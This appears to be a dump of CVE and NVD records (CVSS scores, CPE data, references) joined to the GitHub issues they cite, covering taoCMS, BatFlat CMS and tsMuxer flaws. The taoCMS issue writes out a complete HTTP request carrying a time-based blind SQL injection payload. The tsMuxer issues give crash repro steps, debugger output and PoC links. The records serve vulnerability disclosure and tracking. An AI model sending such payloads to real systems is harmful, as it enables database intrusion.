[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taocms:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "98036B99-8DC6-4F7F-9450-763A199E6148", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/taogogo/taocms/issues/23
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
``` POST /admin/admin.php HTTP/1.1 Host: taocms.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://taocms.test/admin/admin.php?action=comment&ctrl=lists Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=q6dpqahlf85bhelm9luc2i6jp3;XDEBUG_SESSION=PHPSTORM Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 56 action=comment&id=5)and(sleep(10))--+&ctrl=update&name=a ``` ![image](https://user-images.githubusercontent.com/29908441/149700008-a4f3f2c6-340a-4181-92b6-096b235c2ea1.png) ![image](https://user-images.githubusercontent.com/29908441/149700032-cd89e52d-525c-41e6-b44c-c8ec838a553e.png) ![image](https://user-images.githubusercontent.com/29908441/149700476-01dad8da-cdb2-4139-973c-a9595cef0a93.png) admin/admin.php ![image](https://user-images.githubusercontent.com/29908441/149700611-5272a3a8-d594-4433-96c7-99ffdff53e1d.png) include/Model/Comment.php ![image](https://user-images.githubusercontent.com/29908441/149700636-87350249-7b76-45a7-a6f2-ea2e1c441113.png) include/Model/Article.php ![image](https://user-images.githubusercontent.com/29908441/149700711-8473680a-6f13-45bd-bd1a-d6b0892fca70.png) include/Db/Mysql.php ![image](https://user-images.githubusercontent.com/29908441/149700776-46e8b7e3-f741-4d93-b1a3-27a861d0302f.png) include/Db/Mysql.php ![image](https://user-images.githubusercontent.com/29908441/149700818-2357f939-6db2-4a28-b40f-e728404fd9ad.png)
There is SQL blind injection at "Comment Update"
https://api.github.com/repos/taogogo/taocms/issues/23/comments
0
2022-01-17T02:51:41Z
2022-01-17T02:51:41Z
https://github.com/taogogo/taocms/issues/23
1,105,307,017
23
3,264
CVE-2021-41652
2022-03-01T23:15:08.397
Insecure permissions in the file database.sdb of BatFlat CMS v1.3.6 allows attackers to dump the entire database.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://deathflash1411.github.io/blog/dumping-batflat-cms-database" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sruupl/batflat/issues/113" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://deathflash1411.github.io/blog/dumping-batflat-cms-database" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sruupl/batflat/issues/113" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:batflat:batflat:1.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "CCD502D1-2B27-4BC5-9DF2-C71F42212D85", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "276" ]
276
https://github.com/sruupl/batflat/issues/113
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sruupl", "batflat" ]
Improper access control leads to accessing the database file (database.sdb) - https://leobreaker1411.github.io/blog/cve-2021-41652
Improper access control
https://api.github.com/repos/sruupl/batflat/issues/113/comments
1
2021-09-20T16:54:46Z
2022-04-07T13:53:26Z
https://github.com/sruupl/batflat/issues/113
1,001,188,810
113
3,265
CVE-2021-45860
2022-03-02T00:15:08.030
An integer overflow in DTSStreamReader::findFrame() of tsMuxer git-2678966 allows attackers to cause a Denial of Service (DoS) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/510" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/511" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/510" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/511" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:*:*:*:*:*:*:*:*", "matchCriteriaId": "2022C236-72EE-451A-AA9D-5F3E2DA838E3", "versionEndExcluding": "2021-12-21", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/justdan96/tsMuxer/issues/510
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
Hi, I found a integer overflow in DTSStreamReader::findFrame() https://github.com/justdan96/tsMuxer/blob/380cca33a2fc68b1f9e7a7c79302b13274ededcd/tsMuxer/dtsStreamReader.cpp#L204-L212 **POC** [poc.zip](https://github.com/justdan96/tsMuxer/files/7750896/poc.zip) With this poc, the buffer is too small but the condition on line 206 results true. **gdb** ``` [----------------------------------registers-----------------------------------] RAX: 0x415550522d484452 ('RDH-RPUA') RBX: 0x6aba60 (<__libc_csu_init>: endbr64) RCX: 0x0 RDX: 0x0 RSI: 0xffffff0000000000 RDI: 0x0 RBP: 0x7fffffff5930 --> 0x7fffffff5a60 --> 0x7fffffffbc70 --> 0x7fffffffc740 --> 0x7fffffffcb40 --> 0x7fffffffe210 (--> ...) RSP: 0x7fffffff58d0 --> 0x7fffffff6da0 --> 0x6ade00 --> 0x5556d0 (<BaseAbstractStreamReader::writeAdditionData(unsigned char*, unsigned char*, AVPacket&, std::vector<std::pair<int, int>, std::allocator<std::pair<int, int> > >*)>: push rbp) RIP: 0x57d9a6 (<DTSStreamReader::findFrame(unsigned char*, unsigned char*)+406>: mov rax,QWORD PTR [rbp-0x18]) R8 : 0x0 R9 : 0x0 R10: 0x0 R11: 0x57d810 (<DTSStreamReader::findFrame(unsigned char*, unsigned char*)>: push rbp) R12: 0x554060 (<_start>: endbr64) R13: 0x7fffffffe300 --> 0x2 R14: 0x0 R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x57d992 <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+386>: movabs rax,0x415550522d484452 0x57d99c <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+396>: cmp QWORD PTR [rbp-0x30],rax 0x57d9a0 <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+400>: jne 0x57d9f5 <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+485>: jne 0x57d9f5 <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+485> => 0x57d9a6 <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+406>: mov rax,QWORD PTR [rbp-0x18] 0x57d9aa <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+410>: add rax,QWORD PTR [rbp-0x40] 0x57d9ae <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+414>: cmp rax,QWORD PTR [rbp-0x20] 0x57d9b2 <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+418>: jbe 0x57d9c5 <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+437>: jbe 0x57d9c5 <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+437> 0x57d9b8 <DTSStreamReader::findFrame(unsigned char*, unsigned char*)+424>: mov QWORD PTR [rbp-0x8],0x0 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff58d0 --> 0x7fffffff6da0 --> 0x6ade00 --> 0x5556d0 (<BaseAbstractStreamReader::writeAdditionData(unsigned char*, unsigned char*, AVPacket&, std::vector<std::pair<int, int>, std::allocator<std::pair<int, int> > >*)>: push rbp) 0008| 0x7fffffff58d8 --> 0x0 0016| 0x7fffffff58e0 --> 0x7fff00000000 0024| 0x7fffffff58e8 --> 0xffffff 0032| 0x7fffffff58f0 --> 0xffffff0000000010 0040| 0x7fffffff58f8 ("AUPR-HDRRDH-RPUA\020\260\223\363\377\177") 0048| 0x7fffffff5900 ("RDH-RPUA\020\260\223\363\377\177") 0056| 0x7fffffff5908 --> 0x7ffff393b010 ("AUPR-HDR\377\377\377") [------------------------------------------------------------------------------] Legend: code, data, rodata, value 206 if (buff + hdrSize > end) gdb-peda$ p hdrSize $12 = 0xffffff0000000010 gdb-peda$ p buff + hdrSize $14 = (uint8_t *) 0x7efff393b020 <error: Cannot access memory at address 0x7efff393b020> gdb-peda$ p buff $17 = (uint8_t *) 0x7ffff393b010 "AUPR-HDR\377\377\377" gdb-peda$ p end $15 = (uint8_t *) 0x7ffff393b093 "" gdb-peda$ p end-buff $21 = 0x83 gdb-peda$ p buff + hdrSize > end $22 = 0x0 ```
An Integer Overflow in DTSStreamReader::findFrame()
https://api.github.com/repos/justdan96/tsMuxer/issues/510/comments
0
2021-12-21T08:53:16Z
2022-06-23T07:12:55Z
https://github.com/justdan96/tsMuxer/issues/510
1,085,586,537
510
3,266
CVE-2021-45861
2022-03-02T00:15:08.080
There is an Assertion `num <= INT_BIT' failed at BitStreamReader::skipBits in /bitStream.h:132 of tsMuxer git-c6a0277.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/478" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/481" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/478" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/481" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:*:*:*:*:*:*:*:*", "matchCriteriaId": "05AA1A0C-51F5-46F3-A82E-5E73923E2877", "versionEndExcluding": "2021-10-19", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/justdan96/tsMuxer/issues/478
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
Hi, I Found an Assertion Failed error. **Some info:** ``` Ubuntu 20.04.3 LTS tsMuxeR version git-c6a0277 ``` **To reproduce** 1. Compile tsMuxer 2. Run tsmuxer ``` tsmuxer ./poc tsMuxeR version git-c6a0277. github.com/justdan96/tsMuxer tsmuxer: tsMuxer/tsMuxer/bitStream.h:132: void BitStreamReader::skipBits(unsigned int): Assertion `num <= INT_BIT' failed. [1] 883819 abort (core dumped) tsmuxer ./poc ``` **POC** [poc.zip](https://github.com/justdan96/tsMuxer/files/7365749/poc.zip) **gdb output** ``` gdb-peda$ r ./poc Starting program: tsMuxer/build/tsMuxer/tsmuxer ./poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". tsMuxeR version git-c6a0277. github.com/justdan96/tsMuxer tsmuxer: tsMuxer/tsMuxer/bitStream.h:132: void BitStreamReader::skipBits(unsigned int): Assertion `num <= INT_BIT' failed. Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff793f080 (0x00007ffff793f080) RCX: 0x7ffff79be18b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffff6ba0 --> 0x0 RDI: 0x2 RBP: 0x7ffff7b33588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffff6ba0 --> 0x0 RIP: 0x7ffff79be18b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffff6ba0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x555555832c90 ("tsMuxer/tsMuxer/bitStream.h") R13: 0x84 R14: 0x555555832cc6 ("num <= INT_BIT") R15: 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff79be17f <__GI_raise+191>: mov edi,0x2 0x7ffff79be184 <__GI_raise+196>: mov eax,0xe 0x7ffff79be189 <__GI_raise+201>: syscall => 0x7ffff79be18b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff79be193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff79be19c <__GI_raise+220>: jne 0x7ffff79be1c4 <__GI_raise+260> 0x7ffff79be19e <__GI_raise+222>: mov eax,r8d 0x7ffff79be1a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff6ba0 --> 0x0 0008| 0x7fffffff6ba8 --> 0x7ffff7a15850 (<__GI___libc_free>: endbr64) 0016| 0x7fffffff6bb0 --> 0x7ffffbad8000 0024| 0x7fffffff6bb8 --> 0x5555558ffcf0 --> 0x5555558ffd90 --> 0x0 0032| 0x7fffffff6bc0 --> 0x5555558ffd55 ("signed int): Assertion `num <= INT_BIT' failed.\n") 0040| 0x7fffffff6bc8 --> 0x5555558ffcf0 --> 0x5555558ffd90 --> 0x0 0048| 0x7fffffff6bd0 --> 0x5555558ffcf0 --> 0x5555558ffd90 --> 0x0 0056| 0x7fffffff6bd8 --> 0x5555558ffd85 --> 0xa1000000 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff799d859 in __GI_abort () at abort.c:79 #2 0x00007ffff799d729 in __assert_fail_base ( fmt=0x7ffff7b33588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x555555832cc6 "num <= INT_BIT", file=0x555555832c90 "tsMuxer/tsMuxer/bitStream.h", line=0x84, function=<optimized out>) at assert.c:92 #3 0x00007ffff79aef36 in __GI___assert_fail (assertion=0x555555832cc6 "num <= INT_BIT", file=0x555555832c90 "tsMuxer/tsMuxer/bitStream.h", line=0x84, function=0x555555832cd8 "void BitStreamReader::skipBits(unsigned int)") at assert.c:101 #4 0x00005555556c3395 in BitStreamReader::skipBits(unsigned int) () #5 0x00005555557f233c in VvcUnitWithProfile::profile_tier_level(bool, int) () #6 0x00005555557f3c36 in VvcSpsUnit::deserialize() () #7 0x00005555557fa234 in VVCStreamReader::checkStream(unsigned char*, int) () #8 0x0000555555742753 in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) () #9 0x0000555555741afb in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) () #10 0x000055555571ca8a in detectStreamReader(char const*, MPLSParser*, bool) () #11 0x000055555571fafc in main () #12 0x00007ffff799f0b3 in __libc_start_main (main=0x55555571ed30 <main>, argc=0x2, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #13 0x00005555556bac2e in _start () gdb-peda$ ```
Assertion Failed in bitStream.h:132 BitStreamReader::skipBits
https://api.github.com/repos/justdan96/tsMuxer/issues/478/comments
1
2021-10-18T14:29:17Z
2022-06-22T21:45:09Z
https://github.com/justdan96/tsMuxer/issues/478
1,029,196,897
478
3,267
CVE-2021-45863
2022-03-02T00:15:08.127
tsMuxer git-2678966 was discovered to contain a heap-based buffer overflow via the function HevcUnit::updateBits in hevc.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/509" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/512" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/509" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/512" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:*:*:*:*:*:*:*:*", "matchCriteriaId": "2022C236-72EE-451A-AA9D-5F3E2DA838E3", "versionEndExcluding": "2021-12-21", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/justdan96/tsMuxer/issues/509
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
Hi, I found a heap-buffer-overflow error. **Some Info** ``` Ubuntu 20.04.3 LTS tsMuxeR version git-2678966. ``` **To reproduce** 1. Compile tsMuxer 2. run tsmuxer ``` tsmuxer ./poc ``` **Asan output** ``` $ tsMuxer-asan ./poc tsMuxeR version git-2678966. github.com/justdan96/tsMuxer This HEVC stream doesn't contain fps value. Muxing fps is absent too. Set muxing FPS to default 25.0 value. HEVC manual defined fps doesn't equal to stream fps. Change HEVC fps from 3.083 to 25 ================================================================= ==452652==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000bd53 at pc 0x55fca9458e01 bp 0x7ffe07198940 sp 0x7ffe07198930 READ of size 1 at 0x60d00000bd53 thread T0 #0 0x55fca9458e00 in HevcUnit::updateBits(int, int, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevc.cpp:76 #1 0x55fca945ae43 in HevcVpsUnit::setFPS(double) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevc.cpp:247 #2 0x55fca946c904 in HEVCStreamReader::updateStreamFps(void*, unsigned char*, unsigned char*, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevcStreamReader.cpp:364 #3 0x55fca958cd7e in MPEGStreamReader::updateFPS(void*, unsigned char*, unsigned char*, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/mpegStreamReader.cpp:310 #4 0x55fca9469c00 in HEVCStreamReader::checkStream(unsigned char*, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevcStreamReader.cpp:77 #5 0x55fca94fb1dc in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/metaDemuxer.cpp:771 #6 0x55fca94f8ede in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/metaDemuxer.cpp:685 #7 0x55fca94a21d5 in detectStreamReader(char const*, MPLSParser*, bool) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/main.cpp:120 #8 0x55fca94a9d7b in main /path/to/tsMuxer/tsMuxer-asan/tsMuxer/main.cpp:699 #9 0x7f2c99c360b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #10 0x55fca93b80ed in _start (/path/to/tsMuxer/tsMuxer-asan/build/tsMuxer/tsmuxer+0x28d0ed) 0x60d00000bd53 is located 14 bytes to the right of 133-byte region [0x60d00000bcc0,0x60d00000bd45) allocated by thread T0 here: #0 0x7f2c9a35cb47 in operator new[](unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10fb47) #1 0x55fca9458931 in HevcUnit::decodeBuffer(unsigned char const*, unsigned char const*) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevc.cpp:40 #2 0x55fca9469ac0 in HEVCStreamReader::checkStream(unsigned char*, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevcStreamReader.cpp:73 #3 0x55fca94fb1dc in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/metaDemuxer.cpp:771 #4 0x55fca94f8ede in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/metaDemuxer.cpp:685 #5 0x55fca94a21d5 in detectStreamReader(char const*, MPLSParser*, bool) /path/to/tsMuxer/tsMuxer-asan/tsMuxer/main.cpp:120 #6 0x55fca94a9d7b in main /path/to/tsMuxer/tsMuxer-asan/tsMuxer/main.cpp:699 #7 0x7f2c99c360b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /path/to/tsMuxer/tsMuxer-asan/tsMuxer/hevc.cpp:76 in HevcUnit::updateBits(int, int, int) Shadow bytes around the buggy address: 0x0c1a7fff9750: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c1a7fff9760: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c1a7fff9770: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fd fd 0x0c1a7fff9780: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c1a7fff9790: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c1a7fff97a0: 00 00 00 00 00 00 00 00 05 fa[fa]fa fa fa fa fa 0x0c1a7fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff97c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff97d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff97e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff97f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==452652==ABORTING ``` **POC** [poc.zip](https://github.com/justdan96/tsMuxer/files/7750590/poc.zip)
heap-buffer-overflow in hevc.cpp:76 HevcUnit::updateBits
https://api.github.com/repos/justdan96/tsMuxer/issues/509/comments
0
2021-12-21T08:06:40Z
2022-06-22T21:43:07Z
https://github.com/justdan96/tsMuxer/issues/509
1,085,548,429
509
3,268
CVE-2021-45864
2022-03-02T00:15:08.173
tsMuxer git-c6a0277 was discovered to contain a segmentation fault via DTSStreamReader::findFrame in dtsStreamReader.cpp.
